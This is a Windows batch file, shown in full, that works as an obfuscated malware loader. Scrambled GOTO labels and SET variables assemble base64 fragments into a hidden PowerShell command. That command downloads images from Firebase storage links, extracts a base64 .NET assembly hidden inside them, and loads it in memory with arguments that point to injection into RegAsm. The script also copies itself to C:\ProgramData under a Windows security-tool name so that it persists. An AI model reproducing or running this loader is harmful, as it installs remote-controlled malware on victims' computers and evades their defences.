@echo off
GOTO FGDIHUIIDD
:GIODISFNSI
SET GGSOJOIKGN=pAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALw
GOTO GNDHGFOGNO1
:NFHKUDIDGD
SET FNJGFIIDGU=0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUA
GOTO DIISFHJSDJ
:UODIJGODFN
SET IGKDDNKISN=8AZgAoACQAZQBuAGQARgBsAGEAZwApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO NGIOODDFNG
:FJNFOGFIGK
SET FSIGFFOSNN=HkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABT
GOTO DISFFOKNND2
:DIGDKGOKJN
SET GNGDGOIDND=AG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYA
GOTO DSIDGFNDDD
:NOGKGGOIDD
SET NNFODGSDIJ=ALwBiAC8AcgBlAG0AYQBzAGQALQA2AGMANwAwADIALgBmAGkAcgBlAGIAYQBzAGUAcwB0A
GOTO GNDHGFOGNO8
:FGSDKFOFNS
SET OIGUGDDGFG=CAAIAAgACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0AHAAJwA7AA0AC
GOTO IGGNDGJIDN5
:IGIIHNNSGN
SET GGONSSNOFF=CAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAd
GOTO DNDGGGJNNO
:INUFINIFGU
SET GISGGNGUOI=AgACAAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAARABvAHcAbgBsAG8AYQBk
GOTO OFFNFGUOSG3
:NSIJNSOIKD
SET UGKDFUFJNN=AIAAgACAAIAAgACAAIAAgACAAJABpAG4AagBlAGMAPQAnAFIAZQBnACcAIAAf#ACAAJwBBAH
GOTO GJDSGNFGSN
:SDOOKGFDKG
SET DOINOUGOGO=ACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AQQBmAHA
GOTO GGNNDFGOOO
:UFJFNOOGKO
SET GJFOOGNFDO=AGsAcwApACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO GNNGDFODNG
:GDIGOJNNSS
SET JUNDNFDFOU=wB0ACAALQBGAGkAcgBzAHQAIAA1ACAAfAAgAEYAbwByAG0AYQB0AC0AVABhAG
GOTO GJUNNSJJGG
:DIISFHJSDJ
SET OJJFOIKFIG=bgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAk
GOTO OFFNFGUOSG8
:DNDGGGJNNO
SET KIOGDOSNSN=AAgADUAIAB8ACAARgBvAHIAbQBhAHQALQBUAGEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQ
GOTO OGDGONJFKF4
:GGNNDFGOOO
SET DSDKNIUGGI=ASQBhAFMAUwAvAG4AaQBhAG0ALwBzAGQAYQBlAGgALwBzAGYAZQByAC8ANwAzADMA
GOTO IIGONDJFND
:JFGGDGJNSJ
SET GJKFDDDHGD=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoA
GOTO IGKGSSGDUD
:GUSIINJIGK
%DSUIDNNDGD%%JJFGDOGFJN%%GSOUHGDDSD%%DFFDNIGFGN%%GDDIFODOKO%%ONJSJGGIIJ%%FFSNSGJINS%%IFJFFIIOKF%%DGGIHHNDDN%%FNDFJNSKNS%%IDGNNGFDGD%%GJFOOGNFDO%%SDFJIDIFDD%%GUDFDIDGDG%%JJONFNFING%%JSNFONUGID%%GDDGKNONUI%%NJOJFGNFFN%%IOJIGSNDSS%%GONDKDJFGF%%FFSJUIDHJS%%OODIOGGFGF%%NNDGGNFHGO%%INFGSINDNH%%OIGUGDDGFG%%DGIHIDFNNI%%FOJSFGNIDI%%DNGGIGGOGK%%NDFIFIFFGJ%%NJOGODNHGH%%GGSOJOIKGN%%DJFDUNKFJD%%DNOIIIDGNF%%KFDSDFDNNU%%GJIIGIOOGF%%FHJDGGNNFD%%UFKOIDDIND%%NNFODGSDIJ%%SGKSIIFJGN%%NNIOHINDDI%%FSFGIDDFGG%%GDIJGHIODD%%GISGGNGUOI%%DFNJFNJSDU%%GJKFDDDHGD%%FFDNGIOHNF%%FNJGFIIDGU%%OJJFOIKFIG%%JIDFDOOGIN%%FJDNDNDUGI%%NNIDIFFGIN%%ONFODJGJSK%%FIGGIJINDF%%DGJIFGGSJJ%%DSIISHNNHG%%GNGDGOIDND%%JIIGFJOJDG%%IKDKGHDFSI%%GDHOFSSOSD%%FJFIJSIGGJ%%IGNSHSJGDG%%DKFDISNDDI%%ODJGIGIJDN%%UGOGKGDFDS%%GDDNKDIJNI%%OOIDUGONIO%%FDFDNNHSOI%%FGSGJSDJIG%%OHSNNOIIFO%%IGKDDNKISN%%SOFSIDJSII%%FSIGFFOSNN%%IOGGJKOFFD%%DSJODDHDOF%%GJNIDNONGK%%NODGSNDSON%%GIDFNNIFGF%%NGDIOJOUGN%%FGFNJFIGOF%%OFFDUKJKGJ%%DINFOUINNN%%IFIOFUOIOG%%GGONSSNOFF%%KIOGDOSNSN%%GGGGDUFSOO%%UOGJJDFIJG%%DOSNOIFDOO%%DIDJUGSOND%%IGUFJGOGSN%%DGKGDNGIOO%%JUNDNFDFOU%%GSIJFDNUDN%%UGKDFUFJNN%%GSGODDJDOD%%JGFJUJNOUU%%FSDJDDNGGF%%DOINOUGOGO%%DSDKNIUGGI%%IJFIHIJGGD%%FDDNGIDOJD%%FGGIKJOJOD%%OIDFOHDKKO%%ISFIDKFJFG%%OOUFHOHNSJ%%GSINGFGIIF%%NFDUONFNII%%FGIGDODDOI%
GOTO OHJNGHDIOG9
:NJJGGSKNDH
SET OODIOGGFGF=kAbgBf#ACkAIAB9ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9A
GOTO IGGNDGJIDN2
:IGGNDGDOFF
SET IKDKGHDFSI=AAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcwB0AGEAcgB0AEkAbgBkAGU
GOTO DOGGGKSGII
:GNDHGFOGNO
SET DFFDNIGFGN=IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByA
GOTO OFFNFGUOSG
:DKGNIHIJNG
SET JSNFONUGID=pAG4AawBzACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMA
GOTO NHDIHGFSHK
:IIGONDJFND
SET IJFIHIJGGD=MQAvADgAMgA3ADQANgAyADMAOAAyADMAMQAvAG0AbwBjAC4AdABuAGUAdABu
GOTO JJGDIJGODI
:GDGFIGOUJI
SET NNIDIFFGIN=AA8AEIAQQAnACAAKwAgACcAUwBFADYANABfACcAIAAf#ACAAJwBTAFQAQQBSAFQAPgA+ACcAOwAgACQ
GOTO JGHGIFJDND1
:DSIDGFNDDD
SET JIIGFJOJDG=KAAkAGUAbgBkAEYAbABhAGcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO IGGNDGDOFF
:OIIGGDDDDG
SET OOUFHOHNSJ=g([regex]::Replace($ddsdgo, ''f#'', ''r'')));iex $oWjuxd\"'";  Copy
GOTO NJKNNJIJJG
:OGDGONJFKF
SET DGGIHHNDDN=HkAcABlAF0AOgA6AFQAbABzADEAMgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO FIDDHODSFS
:OGDGONJFKF7
SET DIDJUGSOND=ZQAnACkAOwANAAoADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEc
GOTO OGDGONJFKF8
:GJUNNSJJGG
SET GSIJFDNUDN=IAbABlACAATgBhAG0AZQAsAEMAUABVAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO NSIJNSOIKD
:IGKGSSGDUD
SET FFDNGIOHNF=CQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABpAG
GOTO NFHKUDIDGD
:JJGGGGNDOG
SET INFGSINDNH=QB0AHUAcgBuACAAJABuAHUAbABsACAAfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgA
GOTO FGSDKFOFNS
:DIJIOGJGNN
SET GDDNKDIJNI=IAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbg
GOTO GFDGGJGNDG5
:JFSFUFNDSD
SET NJOJFGNFFN=AdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO GIINGGOJJO8
:IGGNDGJIDN
SET GSOUHGDDSD=.exe -WindowStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQAKACAA
GOTO GNDHGFOGNO
:SDFNNHDGIG
SET FGIGDODDOI=     
GOTO GUSIINJIGK
:NJKNNJIJJG
SET GSINGFGIIF=-Item -Path '%~f0' -Destination 'C:\ProgramData\SecurityHealthSyst
GOTO OHJNGHDIOG5
:IGGNDGJIDN5
SET DGIHIDFNNI=gAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABCAHkAd
GOTO IGGNDGJIDN6
:GNDHGFOGNO8
SET SGKSIIFJGN=G8AcgBhAGcAZQAuAGEAcABwAC8AbwAvAGkAbQBhAGcAZQAuAGoAcABnAD8AYQB
GOTO GNDHGFOGNO9
:GNNGDFODNG
SET SDFJIDIFDD=AAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQ
GOTO FGNKIOJFIO
:OHJNGHDIOG
SET IDGNNGFDGD=G0ATABpAG4AawBzACAAewAgAHAAYQByAGEAbQAgACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAkAGwAaQBu
GOTO UFJFNOOGKO
:OFFNFGUOSG
SET GDDIFODOKO=HQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1AA0ACgAgACAAIAAgACAAIAAgACAAI
GOTO JGHGIFJDND
:OHJNGHDIOG6
                 
GOTO SDFNNHDGIG
:FGNKIOJFIO
SET GUDFDIDGDG=AIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAA0ACgAgAC
GOTO GJIDNDDKOG
:OGDGONJFKF4
SET GGGGDUFSOO=AKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHQAeQBwAG
GOTO OGDGONJFKF5
:NGIOODDFNG
SET SOFSIDJSII=CAAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTA
GOTO FJNFOGFIGK
:OGDGONJFKF9
SET DGKGDNGIOO=AVQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAY
GOTO GDIGOJNNSS
:GFDGGJGNDG
SET FFSNSGJINS=ABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG
GOTO DISFFOKNND
:OGDGONJFKF8
SET IGUFJGOGSN=AZQB0AC0AUAByAG8AYwBlAHMAcwAgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABDAFA
GOTO OGDGONJFKF9
:OHJNGHDIOG5
SET NFDUONFNII=ray.bat' -Force -ErrorAction SilentlyContinue"
GOTO OHJNGHDIOG6
:IGGNDGJIDN7
SET DNGGIGGOGK=IAAgACAAIAAgACQAbABmAHMAZABmAHMAZABnACAAPQAgACAAJABCAHkAdABlAHMAIAAf#ACQAQgB5AH
GOTO IGGNDGJIDN8
:GNDHGFOGNO4
SET GJIIGIOOGF=GIALQBkADQAZAA5AC0ANAA0ADAAYQAtADkAYwAxADQALQA5AGUAMgBkADQAOAA2ADgAZAA3
GOTO GNDHGFOGNO5
:OHJNGHDIOG1
SET OIDFOHDKKO=AkAGkAbgBqAGUAYwAsACAAJwAxACcAIAAsACAAJwB4ADgANgAnACkAKQB9AH0A'';$oWjuxd = [sy
GOTO OHJNGHDIOG2
:GJGNFOJNGF
SET DSJODDHDOF=4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAA
GOTO DISFFOKNND4
:FONIINNGFS
SET JGFJUJNOUU=ACAAIAAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0A
GOTO OGIFDNDDUS
:OFFNFGUOSG9
SET FJDNDNDUGI=CAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAP
GOTO GDGFIGOUJI
:OGIFDNDDUS
SET FSDJDDNGGF=ZQB0AGgAbwBkACgAJwBsAGYAcwBnAGUAZABkAGQAZABkAGQAZABhACcAKQAuAEkAbgB2AG8AawBl
GOTO SDOOKGFDKG
:DISFFOKNND
SET IFJFFIIOKF=8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUA
GOTO OGDGONJFKF
:DISFFOKNND4
SET GJNIDNONGK=kAGUAbgBkAEYAbABhAGcAKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAP
GOTO DISFFOKNND5
:DISFFOKNND7
SET NGDIOJOUGN=ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG
GOTO DISFFOKNND8
:OFFNFGUOSG1
SET GDIJGHIODD=7ACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO INUFINIFGU
:GNDHGFOGNO3
SET KFDSDFDNNU=8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQBmADQANwA4ADkANQA3A
GOTO GNDHGFOGNO4
:SDGGKOHDII
SET DGJIFGGSJJ=ABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgAA0ACg
GOTO JGHGIFJDND4
:DOGGGKSGII
SET GDHOFSSOSD=AeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZ
GOTO OFDSOFFSGO
:GFDGGJGNDG0
SET IGNSHSJGDG=GQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAIAANAA
GOTO GFDGGJGNDG1
:OGDGONJFKF0
SET DINFOUINNN=IAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAF
GOTO OGDGONJFKF1
:GJIDNDDKOG
SET JJONFNFING=AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATAB
GOTO DKGNIHIJNG
:GFDGGJGNDG6
SET FDFDNNHSOI=B0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaABoACkAO
GOTO GFDGGJGNDG7
:JJGDIJGODI
SET FDDNGIDOJD=AG8AYwByAGUAcwB1AGIAdQBoAHQAaQBnAC4AdwBhAHIALwAvADoAcwAnACwAIAAnADEAJwAsAC
GOTO OHJNGHDIOG0
:OFDSOFFSGO
SET FJFIJSIGGJ=wB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAIAB7ACAAJABzAHQAYQByAHQASQBuA
GOTO GFDGGJGNDG0
:GJDSGNFGSN
SET GSGODDJDOD=MAbQAnADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO FONIINNGFS
:GFDGGJGNDG3
SET UGOGKGDFDS=C0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwANAAoAIAAgACAAIAAgACAAIAAgACAA
GOTO DIJIOGJGNN
:IGGNDGJIDN6
SET FOJSFGNIDI=ABlAHMAMgAgAD0AIAAnAHMAOgAvAC8AJwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAA
GOTO IGGNDGJIDN7
:NHDIHGFSHK
SET GDDGKNONUI=dAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAEwAZQBuAGc
GOTO JFSFUFNDSD
:GNDHGFOGNO2
SET DNOIIIDGNF=GUAcwB0AG8AcgBhAGcAZQAuAGEAcABwAC8AbwAvAGkAbQBhAGcAZQAuAGoAcABnAD
GOTO GNDHGFOGNO3
:DISFFOKNND9
SET OFFDUKJKGJ=AGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwANAAoAIAAgACAAIAAgACAA
GOTO OGDGONJFKF0
:OFFNFGUOSG3
SET DFNJFNJSDU=AEQAYQB0AGEARgByAG8AbQBMAGkAbgBf#AHMAIAAkAGwAaQBuAGsAcwA7AA0ACgAgA
GOTO JFGGDGJNSJ
:OFFNFGUOSG8
SET JIDFDOOGIN=AGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgA
GOTO OFFNFGUOSG9
:OGDGONJFKF1
SET IFIOFUOIOG=MAbwByAHQALQBPAGIAagBlAGMAdAAgAEMAUABVACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnA
GOTO IGIIHNNSGN
:GIINGGOJJO
SET JJFGDOGFJN=nd "Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell
GOTO IGGNDGJIDN
:IGGNDGJIDN0
SET FFSJUIDHJS=AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAG
GOTO NJJGGSKNDH
:FIDDHODSFS
SET FNDFJNSKNS=ACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEYAcgBvA
GOTO OHJNGHDIOG
:GIINGGOJJO8
SET IOJIGSNDSS=AGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHUAZgBmAG
GOTO GIINGGOJJO9
:JGHGIFJDND
SET ONJSJGGIIJ=AAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAU
GOTO GFDGGJGNDG
:DISFFOKNND5
SET NODGSNDSON=QAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAG
GOTO DISFFOKNND6
:OGDGONJFKF5
SET UOGJJDFIJG=UAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcAB
GOTO OGDGONJFKF6
:GNDHGFOGNO9
SET NNIOHINDDI=sAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAyADAANgA2ADQAZAA4AGIALQA5AGYA
GOTO OFFNFGUOSG0
:GFDGGJGNDG2
SET ODJGIGIJDN=hAHMAZQA2ADQATABlAG4AZwB0AGgAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgA
GOTO GFDGGJGNDG3
:GNDHGFOGNO1
SET DJFDUNKFJD=B2ADAALwBiAC8AcgBlAG0AYQBzAGQALQA2AGMANwAwADIALgBmAGkAcgBlAGIAYQBzA
GOTO GNDHGFOGNO2
:OFFNFGUOSG0
SET FSFGIDDFGG=NQAxAC0ANABmAGMAMAAtADgANAAzADkALQAzAGMAYwBhADEANABlAGEANwBmAGMANAAnACkAKQA
GOTO OFFNFGUOSG1
:IGGNDGJIDN2
SET NNDGGNFHGO=DsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZ
GOTO JJGGGGNDOG
:GFDGGJGNDG7
SET FGSGJSDJIG=wANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkA
GOTO GFDGGJGNDG8
:FGDIHUIIDD
SET DSUIDNNDGD=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Comma
GOTO GIINGGOJJO
:DISFFOKNND2
SET IOGGJKOFFD=AHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAgACAAJABlAG
GOTO GJGNFOJNGF
:GFDGGJGNDG1
SET DKFDISNDDI=oAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYgB
GOTO GFDGGJGNDG2
:IGGNDGJIDN8
SET NDFIFIFFGJ=QAZQBzADIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO IGGNDGJIDN9
:DISFFOKNND6
SET GIDFNNIFGF=wAYQBnACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO DISFFOKNND7
:JGHGIFJDND4
SET DSIISHNNHG=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAG4AZABJ
GOTO DIGDKGOKJN
:GIINGGOJJO9
SET GONDKDJFGF=wAZQBkAEwAaQBuAGsAcwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB3
GOTO IGGNDGJIDN0
:JGHGIFJDND2
SET FIGGIJINDF=nADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAV
GOTO SDGGKOHDII
:OHJNGHDIOG2
SET ISFIDKFJFG=stem.Text.encoding]::Unicode.GetString([system.convert]::Frombase64strin
GOTO OIIGGDDDDG
:DISFFOKNND8
SET FGFNJFIGOF=0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBh
GOTO DISFFOKNND9
:OGDGONJFKF6
SET DOSNOIFDOO=lACgAJwB0AGUAcwB0AHAAbwB3AGUAcgBzAGgAZQBsAGwALgBIAG8AYQBhAGEAYQBhAGEAcwBkAG0A
GOTO OGDGONJFKF7
:IGGNDGJIDN9
SET NJOGODNHGH=AAgACQAbABpAG4AawBzACAAPQAgAEAAKAAoACQAbABmAHMAZABmAHMAZABnACAAKwAgACcAZgB
GOTO GIODISFNSI
:GNDHGFOGNO5
SET FHJDGGNNFD=ADYAMAAnACkALAAoACQAbABmAHMAZABmAHMAZABnACAAKwAgACcAZgBpAHIAZQBiAG
GOTO GNDHGFOGNO6
:JGHGIFJDND1
SET ONFODJGJSK=AZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgA
GOTO JGHGIFJDND2
:GFDGGJGNDG8
SET OHSNNOIIFO=bgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE
GOTO UODIJGODFN
:GNDHGFOGNO6
SET UFKOIDDIND=EAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADA
GOTO NOGKGGOIDD
:OHJNGHDIOG0
SET FGGIKJOJOD=AAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAnACwAIA
GOTO OHJNGHDIOG1
:GFDGGJGNDG5
SET OOIDUGONIO=BkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcw
GOTO GFDGGJGNDG6
:OHJNGHDIOG9